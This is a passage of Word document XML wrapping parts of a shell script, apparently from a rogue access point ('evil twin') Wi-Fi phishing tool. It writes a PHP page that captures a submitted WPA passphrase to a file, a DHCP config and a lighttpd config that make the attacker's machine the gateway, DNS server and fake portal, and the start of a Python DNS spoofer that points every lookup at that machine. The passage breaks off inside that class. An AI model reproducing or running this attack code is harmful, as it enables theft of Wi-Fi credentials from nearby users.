    <w:p w14:paraId="12D2E3C6" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="3F78D44F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>// Receive form Post data and Saving it in variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1975A914" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="51E41797" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>\$key1 = @\$_POST['key1'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3669E5F4" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="17A7A346" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>// Write the name of text file where data will be store</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152F81E9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>\$filename = \"$DUMP_PATH/data.txt\";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A977413" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>\$filename2 = \"$DUMP_PATH/status.txt\";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4CF216" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>\$intento = \"$DUMP_PATH/intento\";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F0397E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="2BDA6839" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="74DD1730" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">// Marge all the variables with text in a single variable. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CF8D63" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>\$f_data= ''.\$key1.'';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15700009" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="04BE106C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="0A88A6BA" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>if ( (strlen(\$key1) &lt; 8) ) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3770D67B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>echo \"&lt;script type=\\\"text/javascript\\\"&gt;alert(\\\"$DIALOG_WEB_LENGHT_MIN\\\");window.history.back()&lt;/script&gt;\";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE10D43" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC6C8B7" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570ED43E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="6EF13E77" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>if ( (strlen(\$key1) &gt; 63) ) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F6434F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>echo \"&lt;script type=\\\"text/javascript\\\"&gt;alert(\\\"$DIALOG_WEB_LENGHT_MAX\\\");window.history.back()&lt;/script&gt;\";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D80ECB6" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5605F91A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E32455E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="299C08B5" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="6206CE42" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>\$file = fopen(\$filename, \"w\");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A23B742" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>fwrite(\$file,\"\$f_data\");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073A2D6E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>fwrite(\$file,\"\n\");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DED8F41" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>fclose(\$file);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9D9696" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="21A700DD" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="1ED8E83E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>\$archivo = fopen(\$intento, \"w\");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025250B8" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>fwrite(\$archivo,\"\n\");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEF4D2E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>fclose(\$archivo);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3970A93E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="32197D9A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">while(1) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F43AC4" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327F1F0F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="51D76295" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>if (file_get_contents(\"\$intento\") == 2) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEDC9B1" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">    header(\"location:final.html\");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135F63CB" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">    break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D842A14" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624F181B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>if (file_get_contents(\"\$intento\") == 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5CB1A8" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">    header(\"location:error.html\");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72183872" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">    unlink(\$intento);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263A5305" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">    break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268FA5FC" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDF6CBE" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="695B97B4" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>sleep(1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D7B6C5" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638B905C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="7C2E0FBB" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>?&gt;" &gt; $DUMP_PATH/data/savekey.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1E71DF" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="41033215" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t># DHCP sunucu yapılandırması oluşturulur</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A520B4" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>echo "authoritative;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E46167" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="6B794EE2" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>default-lease-time 600;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D42339" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>max-lease-time 7200;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10580392" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="1B8DC4EB" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>subnet $RANG_IP.0 netmask 255.255.255.0 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C82CC9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="226AE474" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>option broadcast-address $RANG_IP.255;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CAE9EA" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>option routers $IP;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787CA38D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>option subnet-mask 255.255.255.0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609B47A4" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>option domain-name-servers $IP;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40183C50" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="7CCEABD1" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>range $RANG_IP.100 $RANG_IP.250;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA25A34" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="326B384F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565C0A1C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>" &gt;$DUMP_PATH/dhcpd.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FCC517" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="3321D2EE" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t># Tüm DNS isteklerini ağ geçidine (bizim bilgisayarımız) yönlendiren komut dosyası (benim değil)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A5CA8E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>echo "server.document-root = \"$DUMP_PATH/data/\"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A58781C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="2F04B1CD" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>server.modules = (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6225C10A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">  \"mod_access\",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6B85FB" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">  \"mod_alias\",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FFD6DD" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  \"mod_accesslog\",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E2863E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">  \"mod_fastcgi\",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A44EDF1" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">  \"mod_redirect\",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6168E77A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">  \"mod_rewrite\"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1085249D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDA6716" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="7BB19ED7" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>fastcgi.server = ( \".php\" =&gt; ((</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682794DD" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  \"bin-path\" =&gt; \"/usr/bin/php-cgi\",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5186DEBE" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  \"socket\" =&gt; \"/php.socket\"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1BED8C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5074FB7C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="32E0A5E8" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>server.port = 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F49714C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>server.pid-file = \"/var/run/lighttpd.pid\"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8C5D67" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t># server.username = \"www\"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E82EBA" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t># server.groupname = \"www\"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44558E94" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="214BAB18" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>mimetype.assign = (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEF7DB3" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>\".html\" =&gt; \"text/html\",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B62EE4" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>\".htm\" =&gt; \"text/html\",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C31CC34" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>\".txt\" =&gt; \"text/plain\",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D73A59A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>\".jpg\" =&gt; \"image/jpeg\",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A5066D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>\".png\" =&gt; \"image/png\",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF43247" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>\".css\" =&gt; \"text/css\"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C39ADDA" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCF58CA" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="4C8E19FE" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="02881299" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>server.error-handler-404 = \"/\"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393E2B95" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="211ACF38" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>static-file.exclude-extensions = ( \".fcgi\", \".php\", \".rb\", \"~\", \".inc\" )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8C6AE4" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>index-file.names = ( \"index.htm\" )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51ED749C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="1D9F5EF7" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>\$SERVER[\"socket\"] == \":443\" {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060AD87D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>url.redirect = ( \"^/(.*)\" =&gt; \"http://www.internet.com\")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691FF412" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ssl.engine                  = \"enable\" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E34D61" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>ssl.pemfile                 = \"$DUMP_PATH/server.pem\"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701C38DC" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BE39B9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB933F6" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="750B68B0" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>#Redirect www.domain.com to domain.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BC1FBF" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>\$HTTP[\"host\"] =~ \"^www\.(.*)$\" {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391ACD4F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>url.redirect = ( \"^/(.*)\" =&gt; \"http://%1/\$1\" )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54433141" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ssl.engine                  = \"enable\" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C5777C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>ssl.pemfile                 = \"$DUMP_PATH/server.pem\"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2285A6F7" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C63202D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>" &gt;$DUMP_PATH/lighttpd.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D6655F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="18FBAD47" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t># Tüm DNS isteklerini ağ geçidine (bizim bilgisayarımız) yönlendiren komut dosyası (benim değil)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A334661" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>echo "import socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1FA996" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="15B9E218" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>class DNSQuery:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17237D46" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">  def __init__(self, data):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4789B601" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">    self.data=data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09181A76" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">    self.dominio=''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBBC906" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="4B1BF92B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">    tipo = (ord(data[2]) &gt;&gt; 3) &amp; 15   # 4bits de tipo de consulta</w:t>
      </w:r>
    </w:p>
